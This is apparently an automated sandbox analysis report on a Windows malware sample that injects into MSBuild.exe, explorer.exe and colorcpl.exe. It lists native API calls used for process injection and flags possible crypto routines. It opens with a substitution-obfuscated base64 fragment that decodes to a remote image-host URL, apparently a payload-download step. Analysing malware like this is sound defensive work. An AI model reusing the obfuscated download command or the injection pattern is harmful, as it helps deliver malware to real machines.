DgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041A350 NtCreateFile, 5_2_0041A350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041A400 NtReadFile, 5_2_0041A400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041A480 NtClose, 5_2_0041A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041A530 NtAllocateVirtualMemory, 5_2_0041A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041A47A NtClose, 5_2_0041A47A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2B60 NtClose,LdrInitializeThunk, 5_2_013C2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_013C2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2AD0 NtReadFile,LdrInitializeThunk, 5_2_013C2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_013C2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_013C2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_013C2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2DD0 NtDelayExecution,LdrInitializeThunk, 5_2_013C2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_013C2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_013C2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2F30 NtCreateSection,LdrInitializeThunk, 5_2_013C2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2FB0 NtResumeThread,LdrInitializeThunk, 5_2_013C2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2F90 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_013C2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2FE0 NtCreateFile,LdrInitializeThunk, 5_2_013C2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_013C2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_013C2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C3010 NtOpenDirectoryObject, 5_2_013C3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C3090 NtSetValueKey, 5_2_013C3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C4340 NtSetContextThread, 5_2_013C4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C35C0 NtCreateMutant, 5_2_013C35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C4650 NtSuspendThread, 5_2_013C4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C39B0 NtGetContextThread, 5_2_013C39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2BA0 NtEnumerateValueKey, 5_2_013C2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2B80 NtQueryInformationFile, 5_2_013C2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2BE0 NtQueryValueKey, 5_2_013C2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2AB0 NtWaitForSingleObject, 5_2_013C2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2AF0 NtWriteFile, 5_2_013C2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C3D10 NtOpenProcessToken, 5_2_013C3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2D00 NtSetInformationFile, 5_2_013C2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C3D70 NtOpenThread, 5_2_013C3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2DB0 NtEnumerateKey, 5_2_013C2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2C00 NtQueryInformationProcess, 5_2_013C2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2C60 NtCreateKey, 5_2_013C2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2CF0 NtOpenProcess, 5_2_013C2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2CC0 NtQueryVirtualMemory, 5_2_013C2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2F60 NtCreateProcessEx, 5_2_013C2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2FA0 NtQuerySection, 5_2_013C2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2E30 NtWriteVirtualMemory, 5_2_013C2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C2EE0 NtQueueApcThread, 5_2_013C2EE0
Source: C:\Windows\explorer.exe Code function: 6_2_0B412E12 NtProtectVirtualMemory, 6_2_0B412E12
Source: C:\Windows\explorer.exe Code function: 6_2_0B411232 NtCreateFile,NtReadFile, 6_2_0B411232
Source: C:\Windows\explorer.exe Code function: 6_2_0B412E0A NtProtectVirtualMemory, 6_2_0B412E0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051535C0 NtCreateMutant,LdrInitializeThunk, 8_2_051535C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_05152D10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152D00 NtSetInformationFile,LdrInitializeThunk, 8_2_05152D00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152DD0 NtDelayExecution,LdrInitializeThunk, 8_2_05152DD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_05152DF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_05152C70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152C60 NtCreateKey,LdrInitializeThunk, 8_2_05152C60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_05152CA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152F30 NtCreateSection,LdrInitializeThunk, 8_2_05152F30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152FE0 NtCreateFile,LdrInitializeThunk, 8_2_05152FE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_05152EA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152B60 NtClose,LdrInitializeThunk, 8_2_05152B60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_05152BA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_05152BF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_05152BE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152AD0 NtReadFile,LdrInitializeThunk, 8_2_05152AD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152AF0 NtWriteFile,LdrInitializeThunk, 8_2_05152AF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05154650 NtSuspendThread, 8_2_05154650
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05153010 NtOpenDirectoryObject, 8_2_05153010
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05153090 NtSetValueKey, 8_2_05153090
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05154340 NtSetContextThread, 8_2_05154340
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05153D10 NtOpenProcessToken, 8_2_05153D10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152D30 NtUnmapViewOfSection, 8_2_05152D30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05153D70 NtOpenThread, 8_2_05153D70
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152DB0 NtEnumerateKey, 8_2_05152DB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152C00 NtQueryInformationProcess, 8_2_05152C00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152CC0 NtQueryVirtualMemory, 8_2_05152CC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152CF0 NtOpenProcess, 8_2_05152CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152F60 NtCreateProcessEx, 8_2_05152F60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152F90 NtProtectVirtualMemory, 8_2_05152F90
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152FB0 NtResumeThread, 8_2_05152FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152FA0 NtQuerySection, 8_2_05152FA0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152E30 NtWriteVirtualMemory, 8_2_05152E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152E80 NtReadVirtualMemory, 8_2_05152E80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152EE0 NtQueueApcThread, 8_2_05152EE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051539B0 NtGetContextThread, 8_2_051539B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152B80 NtQueryInformationFile, 8_2_05152B80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05152AB0 NtWaitForSingleObject, 8_2_05152AB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4A350 NtCreateFile, 8_2_02F4A350
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4A480 NtClose, 8_2_02F4A480
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4A400 NtReadFile, 8_2_02F4A400
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4A530 NtAllocateVirtualMemory, 8_2_02F4A530
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4A47A NtClose, 8_2_02F4A47A
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D9EC 5_2_0041D9EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041DB1E 5_2_0041DB1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00409E50 5_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041DED4 5_2_0041DED4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041DE88 5_2_0041DE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01418158 5_2_01418158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0145B16B 5_2_0145B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01380100 5_2_01380100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137F172 5_2_0137F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013C516C 5_2_013C516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142A118 5_2_0142A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014481CC 5_2_014481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139B1B0 5_2_0139B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014501AA 5_2_014501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143F0CC 5_2_0143F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144F0E0 5_2_0144F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014470E9 5_2_014470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013970C0 5_2_013970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144A352 5_2_0144A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144132D 5_2_0144132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137D34C 5_2_0137D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014503E6 5_2_014503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013D739A 5_2_013D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139E3F0 5_2_0139E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430274 5_2_01430274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013952A0 5_2_013952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014312ED 5_2_014312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AD2F0 5_2_013AD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB2C0 5_2_013AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390535 5_2_01390535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01447571 5_2_01447571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01450591 5_2_01450591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142D5B0 5_2_0142D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01442446 5_2_01442446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01381460 5_2_01381460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144F43F 5_2_0144F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143E4F6 5_2_0143E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390770 5_2_01390770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B4750 5_2_013B4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144F7B0 5_2_0144F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138C7C0 5_2_0138C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014416CC 5_2_014416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AC6E0 5_2_013AC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A6962 5_2_013A6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01399950 5_2_01399950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AB950 5_2_013AB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013929A0 5_2_013929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0145A9A6 5_2_0145A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FD800 5_2_013FD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139A840 5_2_0139A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01392840 5_2_01392840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013768B8 5_2_013768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE8F0 5_2_013BE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013938E0 5_2_013938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144AB40 5_2_0144AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144FB76 5_2_0144FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01446BD7 5_2_01446BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01405BF0 5_2_01405BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AFB80 5_2_013AFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013CDBF9 5_2_013CDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01447A46 5_2_01447A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144FA49 5_2_0144FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01403A6C 5_2_01403A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143DAC6 5_2_0143DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013D5AA0 5_2_013D5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138EA80 5_2_0138EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0142DAAC 5_2_0142DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01441D5A 5_2_01441D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01447D73 5_2_01447D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139AD00 5_2_0139AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01393D40 5_2_01393D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A8DBF 5_2_013A8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138ADE0 5_2_0138ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AFDC0 5_2_013AFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390C00 5_2_01390C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01409C32 5_2_01409C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144FCF2 5_2_0144FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01380CF2 5_2_01380CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01430CB5 5_2_01430CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01404F40 5_2_01404F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B0F30 5_2_013B0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013D2F28 5_2_013D2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144FF09 5_2_0144FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01391F92 5_2_01391F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01382FC8 5_2_01382FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144FFB1 5_2_0144FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01390E59 5_2_01390E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144EE26 5_2_0144EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01399EB0 5_2_01399EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144EEDB 5_2_0144EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A2E90 5_2_013A2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0144CE93 5_2_0144CE93
Source: C:\Windows\explorer.exe Code function: 6_2_0B411232 6_2_0B411232
Source: C:\Windows\explorer.exe Code function: 6_2_0B408D02 6_2_0B408D02
Source: C:\Windows\explorer.exe Code function: 6_2_0B40E912 6_2_0B40E912
Source: C:\Windows\explorer.exe Code function: 6_2_0B40BB30 6_2_0B40BB30
Source: C:\Windows\explorer.exe Code function: 6_2_0B40BB32 6_2_0B40BB32
Source: C:\Windows\explorer.exe Code function: 6_2_0B4145CD 6_2_0B4145CD
Source: C:\Windows\explorer.exe Code function: 6_2_0B410036 6_2_0B410036
Source: C:\Windows\explorer.exe Code function: 6_2_0B407082 6_2_0B407082
Source: C:\Windows\explorer.exe Code function: 6_2_0E8E9232 6_2_0E8E9232
Source: C:\Windows\explorer.exe Code function: 6_2_0E8E3B32 6_2_0E8E3B32
Source: C:\Windows\explorer.exe Code function: 6_2_0E8E3B30 6_2_0E8E3B30
Source: C:\Windows\explorer.exe Code function: 6_2_0E8DF082 6_2_0E8DF082
Source: C:\Windows\explorer.exe Code function: 6_2_0E8E8036 6_2_0E8E8036
Source: C:\Windows\explorer.exe Code function: 6_2_0E8EC5CD 6_2_0E8EC5CD
Source: C:\Windows\explorer.exe Code function: 6_2_0E8E0D02 6_2_0E8E0D02
Source: C:\Windows\explorer.exe Code function: 6_2_0E8E6912 6_2_0E8E6912
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05120535 8_2_05120535
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D7571 8_2_051D7571
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051E0591 8_2_051E0591
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051BD5B0 8_2_051BD5B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DF43F 8_2_051DF43F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D2446 8_2_051D2446
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05111460 8_2_05111460
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051CE4F6 8_2_051CE4F6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05144750 8_2_05144750
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05120770 8_2_05120770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DF7B0 8_2_051DF7B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0511C7C0 8_2_0511C7C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D16CC 8_2_051D16CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0513C6E0 8_2_0513C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051BA118 8_2_051BA118
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_05110100 8_2_05110100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0510F172 8_2_0510F172
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051EB16B 8_2_051EB16B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0515516C 8_2_0515516C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0512B1B0 8_2_0512B1B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051E01AA 8_2_051E01AA
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D81CC 8_2_051D81CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051CF0CC 8_2_051CF0CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051270C0 8_2_051270C0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D70E9 8_2_051D70E9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DF0E0 8_2_051DF0E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051D132D 8_2_051D132D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051DA352 8_2_051DA352
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0510D34C 8_2_0510D34C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0516739A 8_2_0516739A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_0512E3F0 8_2_0512E3F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051E03E6 8_2_051E03E6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051C0274 8_2_051C0274
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051252A0 8_2_051252A0
